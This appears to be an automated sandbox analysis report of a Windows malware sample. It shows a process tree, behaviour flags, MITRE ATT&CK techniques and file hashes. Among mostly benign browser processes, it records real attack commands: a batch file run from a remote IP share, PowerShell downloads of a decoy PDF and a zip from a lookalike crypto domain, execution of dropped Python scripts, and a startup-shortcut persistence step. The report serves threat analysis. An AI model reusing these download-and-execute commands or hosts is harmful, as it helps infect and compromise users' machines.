    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
    3⤵
    PID:1716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
    3⤵
    PID:4168
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
    3⤵
    PID:572
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
    3⤵
    PID:1452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
    3⤵
    PID:3076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
    3⤵
    PID:4024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
    3⤵
    PID:2032
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
    3⤵
    PID:2872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2520 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2104
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
    3⤵
    PID:2408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
    3⤵
    PID:6076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
    3⤵
    PID:5628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
    3⤵
    PID:5788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
    3⤵
    PID:5804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:1
    3⤵
    PID:4608
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:8
    3⤵
    PID:1868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
    3⤵
    PID:2300
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
    3⤵
    PID:2636
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6260 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:5936
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4604 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:5804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
    3⤵
    PID:4056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
    3⤵
    PID:1072
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6996 /prefetch:1
    3⤵
    PID:2996
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1
    3⤵
    PID:1476
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
    3⤵
    PID:3584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3932 /prefetch:8
    3⤵
    PID:6052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5812 /prefetch:8
    3⤵
    - Modifies registry class
    PID:2812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
    3⤵
    PID:5908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""\\38.62.245.50\file\contract_file.bat" "
  2⤵
  PID:3864
- - C:\Windows\system32\cmd.exe
    cmd /c "\\38.62.245.50\file\contract_file.bat" min
    3⤵
    - Modifies registry class
    PID:1892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest -uri http://38.62.245.50/filee.pdf -o filee.pdf"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1268
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\filee.pdf"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1860
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4660
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D99621A685D95231A9D4B2515E1B334D --mojo-platform-channel-handle=1784 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4680
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=85C85F943E7F088F11658AF1DC7A6961 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=85C85F943E7F088F11658AF1DC7A6961 --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2976
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A3156D3AC11D7DB1CCA7D97504AF7BB5 --mojo-platform-channel-handle=2344 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2328
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=423416C73A5E0DE6F35A43D4E4A0F624 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=423416C73A5E0DE6F35A43D4E4A0F624 --renderer-client-id=5 --mojo-platform-channel-handle=2000 --allow-no-sandbox-job /prefetch:1
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:236
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=690396C058E3711DABC5E03A7DEACBB8 --mojo-platform-channel-handle=2724 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5188
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=43CF7D1F02E0237861D2C50188793C95 --mojo-platform-channel-handle=2848 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest -uri https://coinmarkettcap.com.ng/window.zip -o window.zip"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive window.zip"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K b.bat
      4⤵
      PID:1252
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\window\window\b.bat"
        5⤵
        
        PID:4436
      - C:\Users\Admin\AppData\Local\window\window\python.exe
        
        python.exe ma.py
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5304
      - C:\Users\Admin\AppData\Local\window\window\python.exe
        
        python.exe ca.py
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K startup.bat
      4⤵
      PID:1648
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\CreateShortcut.vbs
        5⤵
        Drops startup file
        
        PID:5312
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:5680
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:952

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4512

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
d2ce4337ad9d81971cd830b37dd5f371

SHA1
72f7889191defdfe03a35ef44cb9b628058b3671

SHA256
